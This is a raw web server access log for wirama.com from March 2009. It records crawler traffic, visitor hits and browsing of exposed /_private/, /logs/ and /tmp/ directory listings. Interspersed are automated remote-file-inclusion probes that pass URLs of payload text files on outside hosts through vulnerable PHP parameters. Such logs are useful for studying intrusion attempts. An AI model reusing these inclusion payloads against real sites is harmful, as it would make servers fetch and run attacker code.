65.254.51.178 - - [06/Mar/2009:20:02:42 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "wirama.com"
67.202.41.3 - - [06/Mar/2009:21:01:37 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.wirama.com"
67.202.41.3 - - [06/Mar/2009:21:01:37 -0800] "GET / HTTP/1.0" 200 900 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.wirama.com"
203.106.67.249 - - [06/Mar/2009:23:20:17 -0800] "GET / HTTP/1.1" 200 916 "http://www.google.com.my/search?rlz=1C1CHMG_enMY291&aq=f&sourceid=chrome&ie=UTF-8&q=wirama" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19" "www.wirama.com"
203.106.67.249 - - [06/Mar/2009:23:20:20 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19" "wirama.com"
72.30.65.34 - - [07/Mar/2009:00:43:24 -0800] "GET /_private/?S=D HTTP/1.0" 200 659 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.55.208.50 - - [07/Mar/2009:01:31:47 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.50 - - [07/Mar/2009:01:31:47 -0800] "GET /_private/?M=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
72.30.65.34 - - [07/Mar/2009:02:14:22 -0800] "GET /logs/access_090101.log HTTP/1.0" 200 7270 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
208.80.195.40 - - [07/Mar/2009:03:37:30 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {3DC000FC-DB7B-6C86-061A-ACFDCE53B020}; .NET CLR 1.0.3705)" "wirama.com"
125.163.130.7 - - [07/Mar/2009:03:49:21 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "www.wirama.com"
125.163.130.7 - - [07/Mar/2009:03:49:27 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "wirama.com"
125.163.130.7 - - [07/Mar/2009:03:49:30 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "wirama.com"
125.163.130.7 - - [07/Mar/2009:03:49:32 -0800] "GET /logs/ HTTP/1.1" 200 1230 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "www.wirama.com"
94.23.3.220 - - [07/Mar/2009:04:48:55 -0800] "GET /logs//index.php?option=http://www.viparenda.ru/includes/images/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
94.23.3.220 - - [07/Mar/2009:04:48:55 -0800] "GET /index.php?option=http://www.viparenda.ru/includes/images/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
65.55.208.51 - - [07/Mar/2009:05:09:22 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.51 - - [07/Mar/2009:05:09:23 -0800] "GET /logs/access.log HTTP/1.1" 200 176931 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
91.205.124.18 - - [07/Mar/2009:06:40:57 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" "www.wirama.com"
91.205.124.18 - - [07/Mar/2009:06:40:57 -0800] "GET / HTTP/1.1" 200 916 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" "www.wirama.com"
65.55.208.48 - - [07/Mar/2009:06:42:49 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.48 - - [07/Mar/2009:06:42:50 -0800] "GET /_private/?D=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.58 - - [07/Mar/2009:07:25:01 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.58 - - [07/Mar/2009:07:25:06 -0800] "GET /jo03.htm HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.62 - - [07/Mar/2009:07:48:47 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.62 - - [07/Mar/2009:07:48:48 -0800] "GET /logs/?S=A HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
208.80.195.37 - - [07/Mar/2009:08:12:01 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; IEMB3; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705)" "www.wirama.com"
89.149.244.57 - - [07/Mar/2009:08:37:33 -0800] "GET / HTTP/1.0" 200 900 "WIRAMA.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "wirama.com"
66.225.253.109 - - [07/Mar/2009:09:14:48 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
66.225.253.109 - - [07/Mar/2009:09:14:48 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
66.225.253.109 - - [07/Mar/2009:09:14:48 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
208.36.144.8 - - [07/Mar/2009:09:42:45 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.wirama.com"
65.55.208.64 - - [07/Mar/2009:10:58:43 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.64 - - [07/Mar/2009:10:58:43 -0800] "GET /logs/ HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.53 - - [07/Mar/2009:11:35:55 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.53 - - [07/Mar/2009:11:35:55 -0800] "GET /_private/ HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
83.119.218.180 - - [07/Mar/2009:11:40:58 -0800] "GET /logs/access_090101.log HTTP/1.1" 200 7270 "http://www.google.com/search?hl=nl&client=safari&rls=nl-nl&ei=v82ySfroMZrU-Qbz7IHiAg&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Mozilla/5.0+(compatible%3B+Charlotte/1.1%3B+http%3A//www.search.com/support/)&spell=1" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; nl-nl) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1" "www.wirama.com"
83.119.218.180 - - [07/Mar/2009:11:40:58 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.wirama.com/logs/access_090101.log" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; nl-nl) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1" "wirama.com"
91.205.124.18 - - [07/Mar/2009:12:02:26 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" "www.wirama.com"
91.205.124.18 - - [07/Mar/2009:12:02:26 -0800] "GET / HTTP/1.1" 200 916 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" "www.wirama.com"
212.100.250.230 - - [07/Mar/2009:14:29:40 -0800] "GET /logs/ HTTP/1.0" 200 1214 "http://www.google.co.uk/search?hl=en&q=Index+of+/+%22logs%22&start=40&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FDM)" "www.wirama.com"
65.55.208.60 - - [07/Mar/2009:14:55:19 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.60 - - [07/Mar/2009:14:55:20 -0800] "GET /tmp/?M=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:10 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:10 -0800] "GET /?N=D HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:10 -0800] "GET /?M=A HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:11 -0800] "GET /?S=A HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:11 -0800] "GET /?D=A HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:11 -0800] "GET /_private/ HTTP/1.1" 200 675 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:11 -0800] "GET /logs/ HTTP/1.1" 200 1230 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:11 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:11 -0800] "GET /?N=A HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:12 -0800] "GET /?M=D HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:12 -0800] "GET /?S=D HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:12 -0800] "GET /?D=D HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:12 -0800] "GET /_private/?N=D HTTP/1.1" 200 675 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:12 -0800] "GET /_private/?M=A HTTP/1.1" 200 675 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:12 -0800] "GET /_private/?S=A HTTP/1.1" 200 675 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:12 -0800] "GET /_private/?D=A HTTP/1.1" 200 675 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:13 -0800] "GET /logs/?N=D HTTP/1.1" 200 1230 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:13 -0800] "GET /logs/?M=A HTTP/1.1" 200 1230 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:13 -0800] "GET /logs/?S=A HTTP/1.1" 200 1230 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:13 -0800] "GET /logs/?D=A HTTP/1.1" 200 1230 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:13 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:14 -0800] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:14 -0800] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:14 -0800] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:14 -0800] "GET /_private/?N=A HTTP/1.1" 200 675 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:14 -0800] "GET /_private/?M=D HTTP/1.1" 200 675 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:14 -0800] "GET /_private/?S=D HTTP/1.1" 200 675 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:14 -0800] "GET /_private/?D=D HTTP/1.1" 200 675 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:14 -0800] "GET /logs/?N=A HTTP/1.1" 200 1230 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:15 -0800] "GET /logs/?M=D HTTP/1.1" 200 1230 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:15 -0800] "GET /logs/?S=D HTTP/1.1" 200 1230 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:15 -0800] "GET /logs/?D=D HTTP/1.1" 200 1230 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:15 -0800] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:15 -0800] "GET /tmp/?M=D HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:15 -0800] "GET /tmp/?S=D HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
74.86.176.75 - - [07/Mar/2009:15:10:15 -0800] "GET /tmp/?D=D HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "wirama.com"
78.151.161.24 - - [07/Mar/2009:16:01:57 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tweak3d.net/joomla/cache/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
78.151.161.24 - - [07/Mar/2009:16:01:58 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tweak3d.net/joomla/cache/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
91.205.124.18 - - [07/Mar/2009:16:04:21 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" "www.wirama.com"
91.205.124.18 - - [07/Mar/2009:16:04:22 -0800] "GET / HTTP/1.1" 200 916 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" "www.wirama.com"
65.55.208.48 - - [07/Mar/2009:17:28:40 -0800] "GET /logs/?N=D HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
64.74.215.250 - - [07/Mar/2009:18:31:27 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.wirama.com"
65.55.208.61 - - [07/Mar/2009:19:29:21 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.61 - - [07/Mar/2009:19:29:22 -0800] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
68.99.181.53 - - [07/Mar/2009:21:25:31 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.wirama.com"
68.99.181.53 - - [07/Mar/2009:21:25:31 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "wirama.com"
38.99.13.121 - - [07/Mar/2009:21:48:47 -0800] "GET /contents.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "wirama.com"
65.55.231.105 - - [07/Mar/2009:23:49:49 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.231.105 - - [07/Mar/2009:23:49:49 -0800] "GET /images/logo.gif HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
87.3.153.38 - - [08/Mar/2009:00:10:05 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "www.wirama.com"
87.3.153.38 - - [08/Mar/2009:00:10:10 -0800] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "www.wirama.com"
87.3.153.38 - - [08/Mar/2009:00:10:16 -0800] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "www.wirama.com"
87.3.153.38 - - [08/Mar/2009:00:10:20 -0800] "GET /_private/form_results.csv HTTP/1.1" 200 0 "http://www.wirama.com/_private/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "www.wirama.com"
87.3.153.38 - - [08/Mar/2009:00:11:19 -0800] "GET / HTTP/1.1" 200 916 "http://www.tradevibes.com/company/profile/wirama" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "www.wirama.com"
87.3.153.38 - - [08/Mar/2009:00:11:25 -0800] "GET /logs/ HTTP/1.1" 200 1230 "http://www.wirama.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "www.wirama.com"
87.3.153.38 - - [08/Mar/2009:00:11:38 -0800] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "www.wirama.com"
87.3.153.38 - - [08/Mar/2009:00:11:41 -0800] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/_private/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "www.wirama.com"
195.190.166.41 - - [08/Mar/2009:00:48:02 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lazar.ru/manager/processors/copyright.txt?%20%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
195.190.166.41 - - [08/Mar/2009:00:48:02 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lazar.ru/manager/processors/copyright.txt?%20%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
205.234.162.82 - - [08/Mar/2009:00:49:54 -0800] "GET /?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
205.234.162.82 - - [08/Mar/2009:00:49:54 -0800] "GET /logs/access.log//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
205.234.162.82 - - [08/Mar/2009:00:49:54 -0800] "GET /logs//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 1235 "-" "Mozilla/5.0" "wirama.com"
65.55.208.50 - - [08/Mar/2009:01:02:51 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.50 - - [08/Mar/2009:01:02:53 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
217.22.60.25 - - [08/Mar/2009:03:03:57 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
217.22.60.25 - - [08/Mar/2009:03:03:57 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
64.15.159.42 - - [08/Mar/2009:03:51:59 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.15.159.42 - - [08/Mar/2009:03:51:59 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.15.159.42 - - [08/Mar/2009:03:51:59 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
194.110.67.138 - - [08/Mar/2009:03:55:12 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
194.110.67.138 - - [08/Mar/2009:03:55:12 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
194.110.67.138 - - [08/Mar/2009:03:55:12 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
194.110.67.138 - - [08/Mar/2009:03:55:37 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
194.110.67.138 - - [08/Mar/2009:03:55:37 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
194.110.67.138 - - [08/Mar/2009:03:55:37 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.232.48.178 - - [08/Mar/2009:04:01:13 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.232.48.178 - - [08/Mar/2009:04:01:13 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.232.48.178 - - [08/Mar/2009:04:01:13 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sindepol.com.br/images/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.60 - - [08/Mar/2009:04:10:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.60 - - [08/Mar/2009:04:10:53 -0700] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
217.22.60.25 - - [08/Mar/2009:04:16:49 -0700] "GET /logs//components/errors.php?error=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
217.22.60.25 - - [08/Mar/2009:04:16:49 -0700] "GET /components/errors.php?error=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
72.30.65.34 - - [08/Mar/2009:04:17:24 -0700] "GET /?S=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
